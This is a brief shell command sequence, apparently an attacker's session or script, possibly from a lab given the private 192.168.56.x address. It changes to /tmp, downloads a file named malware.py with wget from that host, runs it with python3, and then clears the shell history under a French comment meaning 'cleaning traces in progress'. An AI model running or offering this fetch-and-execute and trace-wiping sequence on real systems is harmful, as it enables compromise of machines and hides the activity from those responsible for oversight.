ls -la
cd /tmp
wget http://192.168.56.101/malware.py
python3 malware.py
# Nettoyage des traces en cours...
history -c
exit
